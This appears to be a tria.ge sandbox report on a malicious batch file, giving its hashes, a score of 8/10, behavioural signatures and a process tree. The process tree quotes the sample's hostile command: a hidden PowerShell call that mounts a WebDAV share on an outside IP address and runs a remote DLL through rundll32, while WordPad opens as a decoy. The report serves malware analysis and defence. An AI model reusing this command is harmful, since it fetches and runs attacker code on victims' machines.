Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
13/07/2024, 02:55
Static task
static1
Behavioral task
behavioral1
Sample
2614525047198718761.bat
Resource
win7-20240708-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
2614525047198718761.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
2614525047198718761.bat
-
Size
2KB
-
MD5
25fb343515dae618bc12f7a0ec192d40
-
SHA1
144dc7d8bc73ce266447c449dcbf9e7ba8a13c88
-
SHA256
053749840e6a1b182d6b0e9d612f8744662cc437250e47ec715af0a4f7669841
-
SHA512
e5817655ba2e8764030226952188a9253db149ff49691d349427075ec1ff4472be0afbc4f33a23feafc80e42d9dff0058bdf0e24412d90d256bfa058d22893bb
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2856 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2856 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2708 wordpad.exe 2708 wordpad.exe 2708 wordpad.exe 2708 wordpad.exe 2708 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2740 wrote to memory of 2708 2740 cmd.exe 32 PID 2740 wrote to memory of 2708 2740 cmd.exe 32 PID 2740 wrote to memory of 2708 2740 cmd.exe 32 PID 2740 wrote to memory of 2856 2740 cmd.exe 33 PID 2740 wrote to memory of 2856 2740 cmd.exe 33 PID 2740 wrote to memory of 2856 2740 cmd.exe 33 PID 2856 wrote to memory of 2328 2856 powershell.exe 35 PID 2856 wrote to memory of 2328 2856 powershell.exe 35 PID 2856 wrote to memory of 2328 2856 powershell.exe 35 PID 2856 wrote to memory of 2668 2856 powershell.exe 36 PID 2856 wrote to memory of 2668 2856 powershell.exe 36 PID 2856 wrote to memory of 2668 2856 powershell.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2614525047198718761.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\2838.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2328
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\2838.dll entry3⤵PID:2668
-
-